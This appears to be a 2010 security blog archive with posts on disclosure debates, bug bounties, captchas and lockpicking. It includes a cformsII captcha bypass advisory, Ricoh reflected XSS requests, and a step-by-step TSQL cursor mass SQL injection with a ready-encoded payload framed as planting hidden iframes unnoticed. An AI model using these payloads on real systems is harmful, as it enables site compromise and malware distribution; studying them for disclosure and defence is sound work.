Where i am really waiting for the other shoe to drop, is from the Microsoft side of things. Microsoft was apparently advised of the issue 6 months ago, and did no follow-up. Zalewski then pinged them again in December, at which point they confirmed the vuln, and asked that he postpone release of the tool indefinitely. Zalewski refused since they failed to provide any good reason as to why they ignored the bug for 6 months. This all comes on the heels of Tavis Ormandy's HCP vuln fiasco. If you're not aware of the PR shit storm that resulted from that, go do some quick Google searches and you'll dig up plenty of vitriol and lots of opinions.

Here's where things get a little fuzzy. Zalewski and Ormandy both refused Microsoft's requests for non-dislosure. Zalewski has not fully disclosed the details of the vuln yet, but has released the tool, so it's probably only a matter of time. I will be interested to see if the same furor starts up again, or if we've gotten over it. The interesting bit comes from the sense of almost vigilantism in this sector. Note that in both of these cases the involved researches released it on their own personal space and time. They are not acting, as far as I can tell, in an official capacity for google in these matters. They are however, making decisions on what to do with tis information, and that gives them a power separate from the entities to whom it most directly applies.

Some people will make the case that this is not a good thing. That security researchers need to be reeled in a bit. Of course, Tavis Ormandy and Michal Zalewski are heroes to me, so i am very biased against this argument. I have to wonder, in fairness, does this argument have some merit? Do Security Researchers have more of an obligation to protect those we seek to help? Or is our obligation, in fact, to truth and the freedom of information? It is a perilous line between, I suspect. we must maintain some degree of professionalism and integrity, otherwise these companies cannot trust us or rely upon us. How do we define the lines of that trust, where do we determine where the trust is being violated by the other side, and what is the appropriate recourse for breaches of this trust? these are probably some of the hardest questions to answer in the information Security field right now.

In the meantime, I continue with my assertion that Tavis Ormandy and Michal Zalewski are heroes, and deserving of my respect and admiration. Maybe that's a self-serving viewpoint. I don't have any firm answers.

A few words about NuCaptcha

2010-12-28T13:08:00.000-08:00

After my recent posting about the Cforms Captcha Bypass Vulnerability the folks over at NuCaptcha asked me to take a look at their offering. I took a poke around the free version of the product/service that they offer.

A Slightly Different Approach:
Lots of people are trying to come up with new and innovative approaches to the Captcha concept as OCR bots continually demolish a lot of the products out there. On top of that, there are pay services now, where humans will set and crunch captchas for you all day long. This leaves us with a question of how to change the game enough to continue moving forward. I've seen a lot of different ideas about this, and nu/captcha's is far from the most innovative. That being said, it works well enough for now. Their Captcha's are animated, and provide text that is and isn't part of the captcha. You are asked to enter in only the text that appears in red.

This is definitely a step in the right direction. That being said, the red text always appears at the end of the string. I would think it might be a little more effectively to randomly colourise charachters within the string, not clumping them together, and not putting them at a predictable location. also, since they are colour coded, I can certainly envision an OCR bot capable of distinguishing colours. This is compensated for a bit by all the animation in the background. Especially the ones with the full advertisements in the background. This provides a lot of 'noise' to help confuse any OCR bots. However, I don't think the NuCaptcha system is going to be impervious to OCR techniques, not by a long shot.

Ways i might suggest to improve this technique:

Use random charachters out of the larger text string to colour code
Colourise all charachters in the string, different colours and randomly select the 'correct' colour each request (one request wants the blue letters, the next the yellows, etc). sort of adding entropy to both the letters and colours

What about the paid OCR crackers? Well, Nucaptcha claims they address this by increasing the ammount of time it take a person to recognise and complete each captcha, by a few seconds. Whether this is true or not, I doubt that it will make much of a serious impact. that being said, if anyone has any better ideas out there, i'd love to hear them.

Where their technique really shines through is more in usability than security. I have gotten to the point where the pure sight of a captcha irritates me. They are often so illegible that an actual human has a hard time filling the stupid things out correctly on the first try. I do not feel any of that frustration with their system. Also the idea to blend advertising space into their solution is a pretty savy business move in my opinion.

The Pseudo-Technical:

so I took some preliminary dives through their offerings. They offer PHP,Java, and .NET APIs. I subjected the .NEt and JAVA APIs to some static analysis tools and let them run. I then ran some quick php examples and their WordPress plugin through a Web application Scanner and let it fly. I snatched at some of their SWF components and ran them through a decompiler app, and didn't find much of itnerest there. Finally I poked and prodded from within burpsuite looking for anything unusual.

The long and short of it is that I found nothing of real interest there. I have not, and probably will not go digging line by line through their source code. For one thing, it looks like a bunch of the real work is offloaded back to their environment to some internal webapps on their side. For another, nothing in my cursory examinations turned up anything the least bit indicative of a problem. Maybe someone more determined will come along and find something i missed.

So is nucaptcha the "most secure" captcha solution out there? Beats me. I don't honestly know how to make such a comparison in the market place. What i do know is that it works, it is end-user friendly, and it does not have any glaring defects. Perhaps not as glowing of a recommendation as they were hoping for, but anything more definitive is just asking for me to be proven wrong. cheers!

UPDATE: Christopher Bailey from NuCaptcha wanted me to point out that the red letters option is only one form the security Captcha can take. They have different variants as can be seen Here. The actual captcha text is still always at a predictable location within the string though, so my suggestion about randomly selecting characters within the string still stands. Thanks to the folk from NuCaptcha for inviting me to take a peek though. I certainly appreciate their openness if nothing else.

Dear Mr Haywood, Welcome to 2010

2010-12-17T07:27:00.000-08:00

There has been some controversy over the recent rise in bug bounty programs. One response was issued by Anthony Haywood, CTO of Idappcom. You can find his article here. I read this article in disbelief at some of the 'points' espoused in this article. I will avoid the more mundane trollings of the article and try to stick to the salient points.

At Idappcom, we’d argue that these sorts of schemes are nothing short of a publicity stunt and, infact, can be potentially dangerous to an end users security.

This is the crux of his argument. It is 2010, and we are still hearing the Security through Obscurity argument touted as a valid security strategy?

One concern is that, by inviting hackers to trawl all over a new application prior to its launch, just grants them more time to interrogate it and identify weaknesses which they may decide is more valuable if kept to themselves.

If a company is already at the phase of it's security evolution where it is attempting bug bounties, it more than likely has an SDL in place. This SDL should include rigorous review, source code analysis, and even penetration testing by an internal security team. Nobody is suggesting that a company should rely solely on bug bounties to find it's security flaws. Intimating that this is happening is a red herring and this statement is a classic example of FUD in action. Mr Haywood is essentially saying "If you let hackers see your program before your customers get it, they will be even more likely to find ways to abuse it". First of all, to my knowledge these bug bounties do not include distributing pre-release versions of code to hackers on the Internet. It is simply a way of incentivising security researchers and/or hackers to responsible disclosure by offering monetary award for their contribution. Mr. Haywood, hackers are already going to be trawling all over these applications. A bug bounty is just trying to bribe them to giving what they find back to the vendor.

Which ties into my second point: what;'s the difference if they see it now or later. If a company did what you're suggesting, there will be a portion of people who may well hold back the information to use after release. There will, however, also be legitimate security researchers who will turn over what they find, which will likely overlap with the findings of the malicious sorts. This increases the chance that the vendor will be able to issue a fix before going to release. Explain to me again, how this is dangerous, or negative in any way?

The hacker would happily claim the reward, promise a vow of silence and then ‘sell’ the details on the black market leaving any user, while the patch is being developed or if they fail to install the update, with a great big security void in their defences just waiting to be exploited.

Yes some malicious hackers will try to do evil, but us good guys will likely find the same things and report it. Your statement seems to imply that anyone looking over the code would be malicious. Frankly, I find this insulting. I have turned in numerous vulnerabilities to vendors without any promise of reward even. I have gone full disclosure in the event that my attempts to elicit a response from the vendor have failed. The same can be said about any number of small time folk like me, never mind people like Tavis Ormandy, Michal Zalewski, HD Moore, Jeremiah Grossman, Rob Hansen , etc. You seem to be taking a pretty broad shot at the security community in general, with statements such as these. moving on.

Sometimes it’s not even a flaw in the software that can cause problems. If an attack is launched against the application, causing it to fail and reboot, then this denial of service (DOS) attack can be just as costly to your organisation as if the application were breached and data stolen.

I'm not even sure what point you are trying to make here. Yes there are Denial of Service vulnerabilities out there. What does that have to do with your argument at all?

A final word of warning is that, even if the application isn’t hacked today, it doesn’t mean that tomorrow they’re not going to be able to breach it.

That's exactly right. That is why a continuous security program needs to be in place. Security needs to be a factor from project conception, through the development lifecycle, all the way past release. Testing needs to be done continually. A bug bounty is a way of crowd sourcing continued testing in the wild.

IT’s never infallible and for this reason penetration testing is often heralded as the hero of the hour. That said technology has moved on and, while still valid in certain circumstances, historical penetration testing techniques are often limited in their effectiveness. Let me explain – a traditional test is executed from outside the network perimeter with the tester seeking applications to attack.

Wow. You take one possible portion of a penetration test, and say "this is what a penetration test is" while ignoring all the other factors at play. An external only Black Box pen test may go like this, but there are many different way to perform a pen test, depending upon the engagement.

However, as these assaults are all from a single IP address, intelligent security software will recognise this behaviour as the IP doesn’t change. Within the first two or three attempts the source address is blacklisted or fire walled and all subsequent traffic is immaterial as all activities are seen and treated as malicious.

If you are really really bad at performing penetration tests, this may be true. A real penetration tester will pivotwhenever possible. Since we are specifically talking about AppSec(that's short for Application Security Mr Haywood) this becomes even more relevant. In pen testing web apps it is extremely easy to disguise yourself as a perfectly normal user. A standard IPS is mostly ineffective in this realm, and WAFS are notoriously hard to configure in any meaningful way that does not break a complex application's functionality. Also, remembering that we are talking AppSec, a good pen tester will probably have proxies he can flow through. So if an IP gets blocked, he just comes from a different IP.

I was a little perplexed by this strange attack on penetration Testing. Then I found this article:

Idappcom seeks to displace penetration testers

Where you claim that your nifty little appliance will somehow replace penetration testers. So we can read your entire position as "don't trust manual testing, buy our product instead". Hardly the first time we've seen such a tactic from the vendors. Let's take a look at this for a moment though. Will your appliance detect someone exploiting a business logic flaw? will it shut down an attacker connecting to a file share with an overly permissive ACL? will it be able to detect multi-step attacks against web applications? Will it really notice a SQL injection attack, and if so how does it know the difference between a valid query and an injected one? These are the sorts of questions that present the burning need for manual human review on a repeat basis. no matter how hard you try, you will never be able to fully automate this. Actual humans will always find things a program can't. Let's move back the the techjournalsouth.com article though.

Instead you need two and both need to be conducted simultaneously if your network’s to perform in perfect harmony:

Application testing combined with intrusion detection

Congratulations, we have all been saying there is no magic bullet for a long time. However, you present only two layers of defense in depth. application Testing and IPS by themselves are not enough. You need a full Security Development Lifecycle. You needs firewalls and IPS systems that are properly configured and audited on a regular basis. You need policies governing change management, and configuration management. You need proper network segmentation and separation of duties. You need hands on testers who know how to tear an application or system apart and find the weak points.

Intrusion detection, capable of spotting zero day exploits, must be deployed to audit and test the recognition and response capabilities of your corporate security defences. It will substantiate that, not only is the network security deployed and configured correctly, but that it’s capable of protecting the application that you’re about to make live or have already launched irrespective of what the service it supports is – be it email, a web service, anything.

First of all, see some of previous points about IPS/WAFS and protecting against web application attacks. Secondly, let;'s talk about your 'zero day' protection. This protection is only as good as the signatures loaded into the device. I could write an entire book on why signature based security mechanisms are doomed to fail, and i would be far from the first person to speak at length on this subject. For some of the high points just look back at my posts with Michal Zalewski about the anti-virus world. I'll leave it there.

While we wait with baited breath to see who will lift Deutsche Post’s Security Cup we mustn’t lose sight of our own challenges. My best advice would be that, instead of waiting for the outcome and relying on others to keep you informed of vulnerabilities in your applications, you must regularly inspect your defences to make sure they’re standing strong with no chinks. If you don’t the bounty may as well be on your head.

Yes, and one of the ways you inspect these defenses, is to have skilled people testing them on a regular basis. Relying on a magic bullet security appliance or application to save you is irresponsible and foolish. Don't buy into vendor FUD.

Special thanks to Dino Dai Zovi(found here and here) for pointing out this article.

cformsII CAPTCHA Bypass Vulnerability

2010-12-15T11:12:00.000-08:00

The cformsII plugin for WordPress contains a vulnerability within its Captcha Verification functionality. This vulnerability exists due to an inherent trust of user controlled input. An attacker could utilise this vulnerability to completely bypass the captcha security mechanism on any wordpress forms created with this plugin.

Captcha Generation:
CformsII generates it's captcha by randomly selecting characters from a character set of ak,m,n,p-z2-9. I assume that the letters l and o, and the numerals 1 and 0 were excluded to avoid any confusion when rendered as an image. It selects a random number of these characters based on preset minimum and maximum limits, and assembles a string of them. It then creates an md5 hash of this string, prepends 'i+' to the hash and sets it as a cookie called 'turing_string_'. See the below code excerpts:
----------------------
$min = prep( $_REQUEST['c1'],4 );
$max = prep( $_REQUEST['c2'],5 );
$src = prep( $_REQUEST['ac'], 'abcdefghijkmnpqrstuvwxyz23456789');
----------------------

### captcha random code
$srclen = strlen($src)-1;
$length = mt_rand($min,$max);

$turing = '';
for($i=0; $i<$length; $i++)
$turing .= substr($src, mt_rand(0, $srclen), 1);

$tu = ($_REQUEST['i']=='i')?strtolower($turing):$turing;

setcookie('turing_string_'.$no, $_REQUEST['i'].'+'.md5($tu),(time()+60*60*5),"/");
--------------------------

This cookie is set when the user is presented with generated captcha image. When they submit their completed form, the capctha code is submitted in a POST parameter titled 'cforms_captcha'. This parameter is then md5'd and compared to the md5 value from the turing_string_ cookie. If the two hashes match, then it is considered to be valid.

-------------------------
else if( $field_type == 'captcha' ){ ### captcha verification

$validations[$i+$off] = 1;

$a = explode('+',$_COOKIE['turing_string_'.$no]);

$a = $a[1];
$b = md5( ($captchaopt['i'] == 'i')?strtolower($_REQUEST['cforms_captcha'.$no]):$_REQUEST['cforms_captcha'.$no]);

if ( $a <> $b ) {
$validations[$i+$off] = 0;
$err = !($err)?2:$err;
}

}
-----------------------

The end result is that an attacker could pre-set a 'valid' captcha string. They then get the md5 hash of the string, and prepend “i%2b” (url encoded 'i+') to the value and set that as the turing_string_ cookie for their post requests. Every request set with this parameter and cookie combination will be inherently trusted as valid from the Captcha standpoint.

The problem here is two fold. The first issue, is that the captcha codes are not one time use codes, as they should be. So even without tricking the Captcha system in the first place, it would be possible to launch a replay attack against this system to generate large amounts of submissions. Each captcha code should only be valid for one use and only during a very limited time window.

The second problem is the trust of user supplied data. The process is meant to create a validation of entered data against another piece of data. However both sets of data are freely offered up to the client-side for tampering. This completely negates the verification process as the server side is not truly in control of the validation at this point.

The take-away:
using cookies to store captcha data then comparing against user supplied input is not an appropriate method of validation for a number of reasons. The captcha code, whether in raw form or hashed should be stored server side for validation, should be valid for only one use, and should be valid only for a limited timeframe. This could be done by using an in-memory array, a database, or even a flatfile.

Ricoh Web Image monitor 2.03 Reflected XSS Vuln

2010-11-09T10:16:00.000-08:00

I was poking at some Ricoh MFPs several days ago, when I found this. It is nothing to get to terribly excited about as it's just a reflected XSS. However, the ability to abuse any trusted internal IP should be treated as a threat. Companies have taken big hits from less. So without further ado, here are the petty little details:

Fun with Redirects:
My inital test was just an abuse of the redirect functionality that is being exploited for the vector.
GET /?";location.href="http://cosine-security.blogspot.com HTTP/1.1

HTTP/1.0 200 OK
Date: Tue, 09 Nov 2010 17:58:00 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Content-Length: 683
Expires: Tue, 09 Nov 2010 17:58:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close

<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="refresh" content="1; URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<title>Web Image Monitor</title>
<script language="javascript">

</script>
</head>
<body onLoad="jumpPage()"></body>
</html>

A more traditional XSS test will still work just as well of course:

Traditional Test:
GET /?--></script><script>alert(51494)</script> HTTP/1.1

HTTP/1.0 200 OK
Date: Fri, 29 Oct 2010 17:43:19 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Content-Length: 672
Expires: Fri, 29 Oct 2010 17:43:19 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close

<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="refresh" content="1; URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<title>Web Image Monitor</title>
<script language="javascript">
</script><script>alert(51494)</script>";
}
// -->
</script>
</head>
<body onLoad="jumpPage()"></body>

Abusing TSQL Cursors for massive SQL Injection

2010-11-04T06:51:00.000-07:00

I'm sure that there are plenty of people who already know about this technique. I have just recently discovered it however. Upon research, it looks like some malware goonies were using this to try and spread Zeus. We are going to look at a very fast and nasty way of abusing a SQL Injection vector. We will be abusing TSQL Cursors in order to rewrite a very large amount of data. So let's build this attack.

First we want to craft our ultimate payload. in this case we are going to make an iframe such as this:

Now we want to spray our hidden little iframe all voer the site. In order to maximise our potential of exposing viewers to it, we are gonig to overwrite all the char, varchar,nchar, and nvarchar fields. We will append our iframe to the end of each record, trying to just add ourselves to the existing data and avoid notice for as long as possible. This is where the TSQL Cursor comes into play. We are going to declare a cursor, based off of the sysobjects and syscolumns table in master. We are looking in those tables for a list of all the *char columsn in suer defined tables. We then sue the cursor to fetch each record and append our iframe in. the query should look something like this:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

When we are all done, we close up shop, and deallocate the cursor. If everything went right, then we will be flying under the radar, and it could be a long time before anyone notices what we have done.

So now we have our payload, but we still need to get it in throguh the SQL Injection vector. to do this, we are going to use the Declare,CAST, EXEC method. We will convert our query to hex, which will give us:

0x4445434c415245204054207661726368617228323535292c404320766172636861722832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420612e6e616d652c622e6e616d652066726f6d207379736f626a6563747320612c737973636f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d27752720616e642028622e78747970653d3939206f7220622e78747970653d3335206f7220622e78747970653d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20657865632827757064617465205b272b40542b275d20736574205b272b40432b275d3d727472696d28636f6e7665727428766172636861722c5b272b40432b275d29292b27273c696672616d65205352433d22687474703a2f2f636f73696e652d73656375726974792e626c6f6773706f742e636f6d223e272727294645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72

In our Injection string we will Declare a variable "Declare @S", then we will cast our Hex String to nvarchar into @S, and then, finally, we Exec @S. Once we have it built, we then URL encode, and we have a nasty little package to send:

DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4445434c415245204054207661726368617228323535292c404320766172636861722832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420612e6e616d652c622e6e616d652066726f6d207379736f626a6563747320612c737973636f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d27752720616e642028622e78747970653d3939206f7220622e78747970653d3335206f7220622e78747970653d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20657865632827757064617465205b272b40542b275d20736574205b272b40432b275d3d727472696d28636f6e7665727428766172636861722c5b272b40432b275d29292b27273c696672616d65205352433d22687474703a2f2f636f73696e652d73656375726974792e626c6f6773706f742e636f6d223e272727294645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72%20AS%20NVARCHAR(4000));EXEC(@S);

This method, could of course b used in a number of different ways, but this is the probably the best bang for the buck. A quick and horribly easy way to turn a vulnerable site into a malware launching platform.

Epic FALE!

2010-10-09T09:30:00.000-07:00

So I got back from Security Bsides Atlanta last night. There were some interesting talks out there. Especially the one on Google and Bing hacking. Some really neat stuff there. Right now though, I want to talk about the guys from FALE . I heard these guys were going to be at Bsides from Schuyler Towne's Kickstarter update. Here's what Schuyler had to say for all of your nonbackers:

I'm sorry you can't be there. However - you can and should go to B-Sides, Atlanta! My friends at FALE: http://lockfale.com/, will be there running workshops, giving talks, and bringing tons of goodies. It's their first time running a Lockpicking Village, but I think they've got an honest shot to make it one of the best in the country. I just shipped them 1.5 gigs of material I've produced too, so hopefully that will add to their already considerable stores.

So go to Bsides I did. Hang out at the Lockpicking village I did. I walked in the door and John immediately says "Hey man, come on in and pick a lock". All the FALE guys introduced themselves, and I told them I was there because of Schuyler's post. That really got things going. Then I told them about the Charlotte Hackerspace and things really got going. I spent a lot of time in the Lockpicking Village, picking locks and hanging out with these guys. They had three challenges running, each one resulting in your name being entered into a drawing. The first Challenge was to simply pick a lock. The second challenge, "The MacGuyver Challenge", was to make your own tool out of scraps and open a lock with it. I went what I thought would be the easiest route, and made a padlock shim. It took me 6 or so tries to get one the right size that wouldn't break in the lock. In the process I cut my thumbs up pretty good. In the end I did open a Brinks padlock with my shim though. The Final Challenge was "The Pro Challenge". this involved opening on of their higher difficulty locks with security drivers. It took me almost an hour and half but I finally got that sucker open, and I was super happy! In the drawings,

I actually got drawn twice in the giveaway, once for my MacGuyver win, which got me a nice starter set of the Sparrows Wizwazzles. I also got drawn for my Pro Challenge win and would ahve taken the largest Southern Specialties basket, but they had a strict 1 win policy. They wouldn't let me upgrade either =/ . It was okay though, because the guy who did win was pretty excited about it, and I was really happy for him. Besides, I will have a big set of Schuyler's picks coming anyways.

The day wrapped up and I braved the god forsaken Atlanta beltway to start home. Once I was clear of the heaviest traffic I decided to pull of at a Wendy's for dinner. Imagine my surprise when I am up at the counter and hear someone shout my name. I turn around, and there are the FALE guys. So we sat down, had dinner and hung out for a little bit. I have gotten past the straight boring facts now, so let me just say this: These guys are so awesome. I had so much fun hanging out with these guys it was nuts. They are smart guys, no doubt, but they are also super friendly, and just plain cool. One of the greatest things about them is their passion. These guys know alot about lock picking, and over that dinner they shared a lot of tips and secrets with me. What was great though, was not the knowledge itself, but the atmosphere around that table. These guys loved not only doing locksport, and knowing locksport, but sharing locksport. These were not like some of your typical hackers, who like to hoard knowledge and dole it out in small bits to make themselves pseudoimprotant. These guys couldn't stop spilling knowledge all over the place. It's like they couldn't help themselves!

They asked me about what I thoguht they could do better next time. I had really very little to offer from this standpoint, except that it would have been cool to talk more about wafer, disc, and tubular locks, and that competitions would have also been cool. They also asked me a bout the HackerSpace, and have expressed a lot of strong interest in coming and visiting, and maybe doing a talk for us. Whether they come up here, or I go down there next, I don't know. What I do know is that FALE and I have not seen the last of each other. Thanks John, Evan, Matt, Scott, and Adam! Oh, and thank you Schuyler for inspiring me to go in the first place!

Google and Safe(r) Browsing

2010-09-29T09:28:00.000-07:00

So Google has announced a new tool. This tool, Safe Browsing Alerts seeks to notify ISPs of malicious web content hosted on their AS. I love to see things like this, and it gives me a little hope for the future. It is the proverbial step in the right direction to my line of thinking. The fight against malware needs to become more proactive. However, I don't know how effective letting AS owners know will be. The information really needs to go more towards hosting companies and the like. people with the ability to pull content.

Here is my brief, idealized, dream. We take the stop badware model and expand it. A strong coalition is created to proactively identify malicious content on the internet and stamp it out where possible. This coalition would include the major AV vendors (Kaspersky, F-Secure, TrendMicro,Symantec,Mcafee, Sophos, etc) and the major search engines Google, Microsoft, and Yahoo(does anyone really use yahoo anymore?). A crawler is designed to go out across the web and look for malicious content. I am envisioning two main branches of this:

As new exploits/payloads are discovered, the crawler searches for specific files or content that indicate the presence of the exploit or payload. Very google-hacking approach. This would be like looking for the windows RDP web connection by doing intitle:"Remote Desktop Web Connection" inurl:tsweb . This detection can be avoided fairly easily, but it will still quickly catch some of the low hanging fruit.
The actual crawler. This crawler goes out and actually analyses the content on the pages it crawls and looks for malicious content. This would be hard to do efficiently, I suspect, but could be done with proper resources.

So, assuming this dream comes true, what happens next? Well, a couple of things would happen at this point. The discovered malicious content would be cataloged. This would then be fed back to the participant companies. It would go to the AV vendors to examine and create new definitions if needed. It would go to the search Providers to reflect in their own search engine results. Suddenly alongside your Google or Bing results, you see a warning "Potentially Dangerous Content Detected". This serves as a warning to the public, sort of a "caveat lector". Then, the coalition should attempt to notify appropriate parties. This could include AS owners, hosting companies, and/or whois contact persons.

None of this of course 'solves' the problem. It is still up to individuals to do the right things. It is up to the user to not go to a site flagged as dangerous, and to have appropriate protection on their machine. It is up to the webmaster to make sure that their sites are not compromised, or hosting malicious content. What this could do, however, is raise visibility and awareness. It would give malware less places to lurk. Of course the bad guys will just move faster, finding new ways of hiding their stuff. It would be a start though. anyways, that's jsut my silly little dream. Who knows, maybe it will one day become a reality.

The Invisible War: March of the /b/tards

2010-09-24T09:00:00.001-07:00

Here goes an attempt at starting a 'series'. The name 'Invisible War' may be reaching a bit, but sometimes it feels like it is appropriate. There are things developing on the internet that have very interesting ramifications. Perhaps I should say growing, instead of developing, as it seems a rather organic process. Today I would like to talk about the Internet Hate Machine that is 4chan.

For a very long time, the Internet has been growing these places. Usenet and IRC have always been bastions of trolls, flamers, and people you just don't want to get into it with. Offensive tactics often included various attack tools to carry out wars of annoyance against targets. I can very clearly remember the good ol days of IRC, full of skiddies with ICMP "nukers" and takeover scripts etc. As with everything else on the Internet, the Hate Machine grew and changed

4chan has become the penultimate embodiment of this writhing entity., thanks to /b/ . The denizens of 4chan /b/, known as /b/tards are an interesting and complicated 'group'. I user the term 'group' very loosely. /b/ is almost anarchy incarnate, and to assign any real structure to it, would be disingenuous. The /b/tards gave rise to Anonymous and all of the internet grief that particular group has caused. If you don't know, Anonymous is the group that carried out the campaign against the Church of Scientology. They launched site defacements, distributed videos that the church tried to suppress, and even organised real life protests outside of Church of Scientology facilities. Anonymous began to demonstrate the true power of Internet Crowd sourcing.

Recently, the /b/tards have been on the move again. The news is abuzz with their attacks againsts the MPAA,RIAA, Aiplex Software, and BPI. This is allegedly in direct response to actions taken against the torrent hosting site thepiratebay.org. While not all of the attacks were successful, they have attracted a lot of notice. One has to wonder if that isn't the true aim. What would they accomplish, long term, by bringing down these servers. Even if they brought them down for more than a few hours, they would be brought back up, and actions would be taken to mitigate the attacks. They are not silencing their opposition, so maybe the goal is the opposite. To create a lot of noise. How many people knew about what Aiplex software was getting up to before, and how many know now? The same with ACS:Law? How much longer will the whole piracy issue stay in people's attention now because of these antics?

I do not know if this result was intended, or if the /b/tards are acting out of a much more visceral drive. Given that the average /b/tard is not amongst the highest forms of life on this planet, i would not ascribe much forethought to mot of their actions. /b/ is rather like a horde of rampaging orcs, but like orcs, once they get started they can be surprisingly effective. I find myself pondering the possability of a few dark sorcerers pulling the strings of this unruly horde. I look at the 'call to arms' for some of these attacks and people start using crappy pe-built skiddie tools a lot of times, that probably have no chance of being truly effective against a serious target. However, if there were a few well hidden masterminds behind the scenes, we see a different picture.

Suppose you are a botherder or malicious hacker with a sinister agenda. You have decided that you can no longer stand the Foo Corp's policies, and want to take them down. You read the reports though, you know even botnets get tracked back to their owners a lot of the time. You need some way to keep the focus off of you. So you go crowd sourcing in /b/ . You whip the /b/tards into a frenzy and they pull out their toys and get ready. some of them undoubtedly know what they are actually doing, and that is even for the better. Now, you give them all a time and date, and everyone launches their attack. The IR Team at Foo Corp all of a sudden sees the deluge hitting their perimeter. While the firewalls and IPs are reflecting most of the useless crap that is being flung at them, you and a few of the more clever blokes, slip right past their perimeter. Their IPS systems are already screaming at the top of their lungs, so who's to notice? You get in, do your damage, and get out. Meanwhile, the deluge continues. By the time it is all done, the folks at Foo Corp are going to have their hands full tracking back through the logs for quite a while. This means that the chances of anything being tracked back to you is greatly diminshed.

So are the denizens of /b/ the new secret cyber warriors? Is there a core cadre within Anonymous that is using the rest of the /b/ crew as little more than pawns? Are they guided by belief that they are in the right? There seems to be evidence that at least some of them are waging an information war. They strike at powerful targets who manipulate the system to their advantage. Groups like the Church of Scientology, MPAA, BPI etc, get away with an awful lot, by turning the system to their advantage, and they sue considerable monetary resources and influence to ensure that they always have the advantage. So are groups like Anonymous just turning the tables a bit? Is this the beginnings of digital revolution? Or is it all just a bunch of angry adolescents with nothing better to do?

I don't have the answers to those questions. What I do know, is that this is a sign of things to come. The Internet is becoming more and more concrete. Impact on the net is having more and more tangible impact in the real world. As this trend increases, what is that going to do to the balance of power in our society, with groups like anonymous running around?

For more information on the recent attacks please read:
http://www.theregister.co.uk/2010/09/24/piracy_threat_lawyers_withstand_ddos/
http://www.theregister.co.uk/2010/09/20/4chan_ddos_mpaa_riaa/
http://www.sophos.com/blogs/chetw/g/2010/09/19/4chan-takes-mpaa-riaa-aiplex-wins/
http://torrentfreak.com/4chan-ddos-takes-down-mpaa-and-anti-piracy-websites-100918/

The CEPT Exam Practical

2010-09-22T06:25:00.000-07:00

I finally received the word that I have passed my Certified Expert Penetration Tester(CEPT) certification exam. This was the best, and most enjoyable certification exam I have ever taken. There is a brief, and rather easy multiple-choice written exam. Then the real work begins. You are given 60 days to complete and submit a practical. This practical has three sections:

Write a working Windows stack overflow exploit for a piece of software they provide
Write a working remote stack overflow or a format string exploit for a piece of code they provide
Reverse engineer a win32 binary to bypass it's registration mechanism.

The first portion of this was surprisingly easy. The software they provide you is an actual piece of windows software. It is old though so it needs to be run in an appropriate environment. I don't recall if it was WinXP compat, but I did all mine in a win2k VM, which provided some interesting challenges in terms of having to go searching through libraries for some calls. Also, you have to get a little tricky because the initial space you have to work with is not large enough for any meaningful shellcode in of itself. However, this really presents little trouble if you know what you're doing. My Time to Completion: 8 hours

I am going to come back to #2 in a minute, instead let's talk about #3. This was by far the most exciting prospect. This is the kind of stuff that just makes you love your work. alas, the IACRB does not put up any real challenge with their supplied target binary. Some well placed breakpoints in softICE and the whole thing reads like a book. Chances are that when you make your first alteration to the binary and test it, you are going to feel really unsatisfied when you realize it's done and you've already won. They throw no tricks or protection schemes in to really trip you up. My Time to completion: 2 hours

